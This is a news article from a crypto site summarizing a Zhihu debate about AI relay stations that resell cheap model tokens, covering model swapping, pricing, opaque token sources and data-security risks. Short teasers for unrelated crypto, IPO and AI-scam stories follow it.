AI Relay Stations Spark Heated Debate on Zhihu: Behind Cheap Tokens, What Are Users Really Worried About?

marsbitPublished on 2026-06-04Last updated on 2026-06-04

Abstract

A discussion on Zhihu about "AI relay stations" shifted the niche developer topic of "cheap tokens" into broader user awareness. Users moved beyond simply questioning the legitimacy of these services to focus on practical concerns: Where do cheap tokens truly come from? Is the model being accessed the real one? Can relay stations see prompts, code, and API keys? For occasional users, are the risks worth it? The core debate centered less on price and more on trust. A primary worry is model authenticity—the risk of "model swapping," where users paying for a premium model might be routed to a cheaper one, creating an information asymmetry. Others argued that cost comparisons matter; while cheaper than official pay-as-you-go APIs, relay stations may not be the lowest-cost option versus subscriptions, domestic models, or free tiers, making user needs assessment crucial. Speculation about token sources ranged from legitimate bulk discounts to gray-area methods like account sharing or exploiting regional pricing. This opacity makes risk assessment difficult for users. Data security emerged as a critical concern, especially for enterprise use. When processing sensitive information like code, contracts, or client data, the inability to verify a relay station's data handling, retention, or access policies poses significant compliance and confidentiality risks. The evolving consensus suggests relay stations can be used cautiously for low-sensitivity, disposable tasks (e.g., summarizi...

A discussion about AI relay stations on Zhihu has brought the once niche developer topic of 'cheap Tokens' to a much broader user base.

Previously, PANews initiated a discussion on Zhihu titled 'What is an AI relay station? What mysteries lie behind cheap Tokens?'. The question was included in the 'Token Economics' roundtable, sparking lively debate on the forum.

The discussion in the answer section did not stop at binary judgments like 'Are relay stations part of the gray market?'. More users were asking several practical questions: Where do the cheap Tokens actually come from? Are the models users access real? Can the relay station see my prompts, code, and API keys? If I only use AI occasionally, is it worth taking this risk?

This shifted the topic of AI relay stations from a 'tool choice' to a broader issue of cost and trust. As AI begins to enter writing, programming, Agent development, and enterprise automation workflows, Tokens are no longer just a billing unit in model documentation; they have become a tangible usage cost felt directly by users.

Beyond Price, Users' First Concern is 'Is the Model Really What It Claims to Be?'

In the Zhihu discussion, one category of opinions that garnered the most attention was not about price itself, but about the authenticity of the models.

In a highly upvoted answer, one respondent compared AI relay stations to 'AI scalpers'. While this analogy carries emotion, it captures users' most intuitive concern: the technical barrier for setting up a relay station is not high, as open-source projects can already handle model routing, key management, balance systems, and OpenAI protocol compatibility. The real challenge isn't building a forwarding service, but obtaining cheap and stable upstream quotas.

Once the upstream source becomes opaque, the model name a user sees may not equal the model actually invoked. The answer section repeatedly mentioned risks like 'model swapping,' 'downgrading,' and 'shadow APIs.' Some users pointed out that in everyday Q&A, the difference between premium and low-cost models isn't always immediately obvious, which ironically creates space for fraud. A user might think they're invoking a flagship model, but in reality, their request could be routed to a lower-cost model, or even have the system prompts mimic the response style of a certain model.

This is also the hardest aspect of cheap Tokens to verify. You can run tests on a fake graphics card, or test the speed of fake bandwidth. However, large language model outputs are inherently random. A model giving a better answer today and a worse one tomorrow doesn't directly prove it was swapped. A relay station could serve the real model during the testing phase and mix in cheaper models during long-term use, making it very difficult for ordinary users to detect.

This type of discussion moves the question from 'Is the cheap price worth it?' to 'Does the user know what they're actually buying?' If the model source cannot be verified, cheap Tokens are not simply a price discount, but a transaction based on information asymmetry.

Relay Stations Aren't Necessarily Cheap; It Depends on the Comparison

Another category of discussion focused on the reference point for cost. Many users noted that relay stations may seem cheap because they often compare themselves to the official API's pay-per-use pricing, rather than to official subscriptions, domestic Chinese models, free tiers, or cloud provider channels.

One response mentioned that for heavy users who fully utilize their official subscription quotas, the unit cost might be lower than some relay stations. Others argued that the pricing of some domestic models is already low enough that for daily development, summarization, translation, and simple coding tasks, routing through overseas model relay stations isn't always necessary.

This perspective doesn't deny the demand for relay stations. Instead, it reminds users to first clarify their own usage patterns. For occasional Q&A, translation, or summarizing public materials, the free tiers of official apps and legitimate tools are often sufficient. For architectural design, code review, or complex reasoning, more powerful models can be used for critical parts, with specific implementations handled by lower-cost models. Relay stations only become a viable option when users truly have sustained, high-frequency, multi-model calling needs.

The perceived low cost of relay stations largely stems from the chosen comparison. Compared to official pay-per-use API prices, they might seem cheap. Compared to subscription plans, domestic models, or free tiers, they might not always be the lowest cost. This viewpoint in the answer section essentially reframes the issue around the user themselves: first assess the need, then evaluate the channel, rather than placing an order just because of a discount.

When the Source of Low Prices is Unpacked, the Cost of Trust Emerges

Regarding where cheap Tokens come from, Zhihu user answers provided various explanations. The milder paths include bulk purchasing, corporate discounts, cloud provider channels, caching, batch processing, and cross-model routing. Theoretically, these methods can allow relay services to maintain profits while offering prices lower than official rates.

However, the discussion more frequently mentioned gray market supply paths: splitting subscription accounts, shared account pools, batch registration to exploit free tiers, regional price arbitrage, refund exploitation, monetizing cloud provider credits, and more aggressive methods like using stolen credit cards or API keys. While different answers didn't fully agree on the severity, they all pointed to one issue: low prices don't come from a single source but are pieced together from a supply pool of multiple channels.

This also explains why it's difficult for users to assess risk. A request today might go through an official channel, tomorrow through a pool of subscription accounts, and the next day, due to upstream account bans, switch to another model. The user sees the same interface, the same model name, and the same balance page, but the backend might be constantly switching.

More measured voices also appeared in the answer section. Some users believed that a 90% discount doesn't necessarily equal a stolen credit card; price reductions could also come from legitimate but opaque bulk discounts, caching, and routing optimizations. This reminder is important. Labeling all relay stations as illegal or fraudulent doesn't explain why the market persists long-term. However, if a platform doesn't clarify its source, limits, failure handling, and data policies, users also struggle to treat it as trustworthy infrastructure.

In other words, low price itself isn't the conclusion, but merely the entry point to the problem. What truly needs calculation isn't just the Token price, but also model authenticity, service stability, balance risk, and data flow.

As the Discussion Escalates to Data Security, Risk Is No Longer Just About 'Dumber Answers'

Data security was another high-frequency topic in the Zhihu answers. Many users are no longer just worried about models becoming 'less intelligent,' but are concerned about whose servers their prompts, code, business documents, and keys pass through.

In ordinary chat scenarios, a relay station at most affects answer quality and billing experience. However, in AI programming, Agent development, and enterprise internal tool scenarios, request content may contain project structures, error logs, database fields, client lists, contract clauses, business plans, and internal meeting minutes. If a relay station logs, retrieves, or resells this content, the risk is no longer just an API bill issue.

Answers from legal and corporate governance perspectives made this issue more concrete. Relevant responses mentioned that when enterprises and professional service organizations use AI tools to handle contracts, case materials, client data, and source code, they need to consider trade secrets, personal information, data cross-border transfer, client confidentiality obligations, and tool reliability. If the calling chain passes through an unidentified relay station, the enterprise would find it difficult to answer questions about whether data is retained, if it's transmitted to third parties, if overseas processing occurs, how long logs are kept, and who can access the backend.

Agent scenarios amplify this risk. Ordinary chat returns text, but an Agent might, based on the model's output, go on to call tools, read files, execute commands, or access links. If a relay station influences the model's returned content, the risk could escalate from 'wrong answer' to 'wrong action.' This is also why the answer section repeatedly emphasized not connecting unknown relay stations to production environments, CI/CD pipelines, internal knowledge bases, and automation tools.

This part of the discussion pushed the issue of relay stations from a consumer-grade tool problem to an enterprise-grade governance problem. For individual users, the risks involve balance, privacy, and experience. For enterprises, risks additionally include procurement compliance, vendor vetting, employees bypassing rules, and liability boundaries after incidents.

The Minimum Consensus Formed in the Zhihu Discussion: It's Usable, But Don't Use It by Default

The discussion didn't yield a simple answer. No one could prove all relay stations are untrustworthy, nor could anyone prove cheap Tokens are definitely safe. The judgment closer to consensus is: relay stations can be used as tools for low-sensitivity, replaceable, interruptible tasks, but they shouldn't become the default entry point for all AI tasks.

For summarizing public materials, simple translation, toy projects, and low-risk testing, small-scale trial use is acceptable. For tasks involving company-private code, production logs, client data, contracts, finance, investment materials, or data from sensitive industries like healthcare and law, they should not be handed over to unknown relay stations. When involving Agents and automated execution, extra caution is needed regarding tool calls, file reading, and key exposure.

Many users in the answer section also gave similar usage advice: don't top up large amounts; don't lock your entire workflow to a single relay station; keep official APIs, domestic models, or legitimate aggregators as backup routes; use fixed test questions to periodically sample model quality; anonymize or summarize data where possible; and do not integrate relay stations into the company's production chain.

This advice may sound uncomplicated, but it is more valuable than 'recommending a specific platform.' The temptation of cheap Tokens lies in lowering the entry barrier, but the real cost of AI use isn't just written on the price list. Model authenticity, data flow, service stability, balance risk, and compliance responsibilities all exist beyond the price.

Under the 'Token Economics' Roundtable, Relay Stations Are Just One Aspect

This is also the significance of including this question in the 'Token Economics' roundtable.

In the context of cryptocurrency, Tokens are often discussed as assets, incentives, and governance tools. In the AI context, Tokens are more like a measurable production cost. They determine how frequently users can use models, whether developers can integrate AI into workflows, and whether enterprises are willing to include model calls in long-term budgets.

The reason AI relay stations sparked heated debate is not because they are particularly novel, but because they brought this sense of cost directly to users. When model capabilities are priced per Token, it's difficult to simultaneously satisfy cheapness, stability, safety, and accountability. What users are truly worried about is not just whether there's a mystery behind cheap Tokens, but how much trust they are surrendering to save on a few calling fees.

Relay stations will likely continue to exist long-term. They solve real pain points regarding access, payment, pricing, and multi-model integration. However, this Zhihu discussion has already provided a clear reminder: the easier AI capabilities are to obtain, the more users need to know where their requests pass through, where the models come from, and what data is left behind.

BitMine adds 7,430 ETH, spends $86M on share buybacks – Why?

BitMine significantly slowed its Ethereum accumulation last week, purchasing only 7,430 ETH—its smallest weekly buy since May. The company instead prioritized shareholder returns, spending approximately $86 million to repurchase 5.5 million common shares. BitMine's ETH treasury remains substantial at 5.78 million ETH (4.8% of circulating supply), nearing its long-term goal of 5%. The company has already staked 85% of its holdings and projects up to $290 million in annual staking revenue. Meanwhile, Michael Saylor's MicroStrategy continues its Bitcoin-focused treasury strategy despite recent sales.

ambcrypto17m ago

BitMine adds 7,430 ETH, spends $86M on share buybacks – Why?

ambcrypto17m ago

9.42 Million Retail Investors Compete for Changxin Technology, Who Got Allotted?

Evergreen Technology's IPO subscription results are now available. On July 20, the domestic memory chip giant announced the offline preliminary allotment results and online lottery results for its IPO. A total of approximately 9.43 million retail investors participated in the online subscription, generating 770,000 winning lots with a final winning rate of about 0.4714%, setting a record for new shares on the STAR Market. After triggering a clawback mechanism from institutional to retail investors, the online retail allocation was significantly increased to 3.851 billion shares. Simultaneously, 285 institutional investors participated in the offline subscription, ultimately receiving 2.173 billion shares at an allotment rate of approximately 0.1756%. Leading insurers and public funds were among the major recipients. Notably, Liang Wenfeng, founder of the major AI model company DeepSeek, through his quantitative investment firms Ningbo Huanfang Quantitative and Zhejiang Jiuzhang Asset, secured the largest share among private funds, with a total allotment worth approximately 175 million yuan. Estimates suggest potential profits could reach 730 million yuan if Evergreen Technology's market capitalization reaches 3 trillion yuan post-listing. The company is expected to list on July 27 and could become the highest-valued tech stock on the A-share market, with various brokerages providing valuations ranging from 1 trillion to over 4 trillion yuan. However, recent significant corrections in global tech stocks may impact its post-listing performance. (Character count: 1,196)

marsbit43m ago

9.42 Million Retail Investors Compete for Changxin Technology, Who Got Allotted?

marsbit43m ago

USCR crypto stabilizes at $0.0022: Can the memecoin reverse Q2 losses?

The memecoin USCR, which tracks sentiment around a potential U.S. Bitcoin reserve, has stabilized at $0.0022 after a 37% drop in June erased its May gains. A recovery above key moving averages could target $0.0028 and potentially $0.0036, representing a 30-60% upside. However, its price is heavily tied to the progress of a bill to establish a formal U.S. BTC reserve. That bill has stalled in Congress, and prediction markets now price only an 18% chance of a reserve being established before 2027. Despite this uncertainty, holder numbers remain relatively strong at 48K. The coin's recovery is contingent on positive developments regarding the reserve legislation.

ambcrypto1h ago

USCR crypto stabilizes at $0.0022: Can the memecoin reverse Q2 losses?

ambcrypto1h ago

3 Million-Follower Goddess Fully AI-Synthesized, Fake Orphanage, Cross-Border ‘Fake Charity’ Collapses Overnight

An Australian influencer named Lily Jay, with nearly 3 million Instagram followers, is at the centre of a major AI-fueled charity scam. Her 'Lily Jay Foundation' claimed to build orphanages, mosques, and deliver aid in places like Uganda and Gaza, using emotionally powerful videos of herself with children. However, an investigation by ABC NEWS Verify revealed these scenes—including a key video announcing an orphanage's opening—were entirely AI-generated, complete with telltale flaws like garbled text on clothing. The foundation's 'humanitarian award' was also faked using AI images. The foundation admitted in small print on its website that it is not a registered charity, avoiding financial transparency laws. While based in Kosovo, its operations and the influencer's lavish personal lifestyle raised further red flags. Following media inquiries, the foundation selectively hid donation buttons and removed fraudulent content for Australian visitors, but kept them active internationally. Experts warn this case is a textbook example of how AI can be weaponized to exploit public trust and generosity, creating believable but entirely fabricated narratives of aid. The incident highlights the growing danger of deepfakes in eroding trust within the charitable sector, urging donors to critically verify causes before giving.

marsbit1h ago

3 Million-Follower Goddess Fully AI-Synthesized, Fake Orphanage, Cross-Border ‘Fake Charity’ Collapses Overnight

marsbit1h ago

L2 'Recalibration': When L1 Becomes Its Own Rollup, What Is Ethereum's Endgame?

The article discusses the evolving relationship between Ethereum's Layer 1 (L1) and Layer 2 (L2) solutions, moving beyond the initial "L2 for scaling" model. As Ethereum L1 itself scales (increasing Gas Limit, statelessness, zkEVM), the unique value proposition of L2s shifts from merely providing cheap execution to offering differentiated features like application-specific optimization, privacy, and flexible governance. The piece explores three key themes: 1. **L2's New Role:** L2s are transitioning from a pure scaling technology to a spectrum of execution environments with varying degrees of security inheritance from Ethereum L1. 2. **Interoperability as State Trust:** Solving L2 fragmentation is less about cross-chain bridges and more about enabling faster, trust-minimized state verification between environments. This involves initiatives like faster L1 finality, intent-based architectures (Open Intents Framework), and native account abstraction. 3. **Blurring Layers:** With the potential integration of zk-proofs into L1 validation (making L1 akin to its own "Rollup") and the concept of "Native Rollups," the rigid boundary between L1 and L2 may fade. The future could be a unified system with multiple execution domains (for DeFi, gaming, privacy, etc.) sharing a common security, settlement, and state framework. In conclusion, Ethereum's goal is not to abandon L2s or re-centralize everything on L1, but to re-integrate the fragmented user experience—liquidity, accounts, applications—while preserving the scaling benefits of a multi-environment ecosystem. The endgame is a cohesive "one chain" feeling for users, powered by diverse but securely interconnected execution layers.

marsbit1h ago

L2 'Recalibration': When L1 Becomes Its Own Rollup, What Is Ethereum's Endgame?

marsbit1h ago

Trading

Spot

AI Relay Stations Spark Heated Debate on Zhihu: Behind Cheap Tokens, What Are Users Really Worried About?

Abstract

Beyond Price, Users' First Concern is 'Is the Model Really What It Claims to Be?'

Relay Stations Aren't Necessarily Cheap; It Depends on the Comparison

When the Source of Low Prices is Unpacked, the Cost of Trust Emerges

As the Discussion Escalates to Data Security, Risk Is No Longer Just About 'Dumber Answers'

The Minimum Consensus Formed in the Zhihu Discussion: It's Usable, But Don't Use It by Default

Under the 'Token Economics' Roundtable, Relay Stations Are Just One Aspect

Related Questions

Related Reads

BitMine adds 7,430 ETH, spends $86M on share buybacks – Why?

9.42 Million Retail Investors Compete for Changxin Technology, Who Got Allotted?

USCR crypto stabilizes at $0.0022: Can the memecoin reverse Q2 losses?

3 Million-Follower Goddess Fully AI-Synthesized, Fake Orphanage, Cross-Border ‘Fake Charity’ Collapses Overnight

L2 'Recalibration': When L1 Becomes Its Own Rollup, What Is Ethereum's Endgame?

Trading

Hot Categories

Hot Tags